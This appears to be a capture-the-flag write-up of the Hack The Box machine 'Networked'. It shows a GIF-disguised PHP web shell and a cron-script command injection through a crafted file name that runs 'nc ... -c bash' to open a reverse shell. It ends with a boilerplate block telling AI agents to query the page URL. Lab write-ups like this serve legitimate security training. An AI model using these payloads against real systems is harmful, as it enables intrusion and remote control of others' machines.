# Exploitation

## Executing Code

```
GIF87a                                                                                                                                                                         
<?php system($_GET['cmd']); ?>
```

![Intercepting and sending to repeater](/files/-MJ51lZSoSEiBCl983_p)

![](/files/-MJ51c6vhHmHKbZ1-wY8)

## Reverse Shell

![](/files/-MJ56XisWNsYRQVaqxuE)

![](/files/-MJ57EyBFAJsquFoA9eM)

## Privilege Escalation

### Found crontab&#x20;

![we can't write since we are not root or gully, can only read check\_attack and crontab ](/files/-MJ7bn3ARDldalRdVm9h)

![crontab executes chech\_attach.php every 3 minutes](/files/-MJ7c5tWLtEDXzWa7dwT)

**Since we cannot write into these files, lets read the check\_attack.php**

```
bash-4.2$ cat check_attack.php
<?php
require '/var/www/html/lib.php';
$path = '/var/www/html/uploads/';
$logpath = '/tmp/attack.log';
$to = 'guly';
$msg= '';
$headers = "X-Mailer: check_attack.php\r\n";

$files = array();
$files = preg_grep('/^([^.])/', scandir($path));

foreach ($files as $key => $value) {
        $msg='';
  if ($value == 'index.html') {
        continue;
  }
  #echo "-------------\n";

  #print "check: $value\n";
  list ($name,$ext) = getnameCheck($value);
  $check = check_ip($name,$value);

  if (!($check[0])) {
    echo "attack!\n";
    # todo: attach file
    file_put_contents($logpath, $msg, FILE_APPEND | LOCK_EX);

    exec("rm -f $logpath");
    exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
    echo "rm -f $path$value\n";
    mail($to, $msg, $msg, $headers, "-F$value");
  }
}

?>
```

Analyzing this script it checks for files that aren't suppose to be in the uploads directory and deletes them, but pay attention to how it deletes the files, it appends them to the *rm* command without any filtering which makes it vulnerable to command injection

```
exec("nohup /bin/rm -f $path$value > /dev/null 2>&1 &");
```

$path is  the value of the upload directory

```
$path = '/var/www/html/uploads/';
```

$value is the suspicious file's name

by going into /var/www/html/uploads, we can create a file that holds the payload in its name. it we start the file with a ; semi colon it will en the rm command and execute whatever code we put.

![demonstrates how file.txt is deleted after three minutes](/files/-MJ7fGLylr735ispBDE_)

```
touch '; nc 10.10.14.34 4444 -c bash'
```

since the script appends the name of the file, we create the above file with the name beggining with ; nc. the semi colon will end the command and execute all other code after it.&#x20;

![](/files/-MJ7hxgx35I4vvib6knc)

![](/files/-MJ8MxucnRABZhuLJiiQ)

![](/files/-MJ8MqQqHnv4COalagxq)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://manuelvazquez-contact.gitbook.io/oscp-prep/hack-the-box/networked/exploitation-1.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.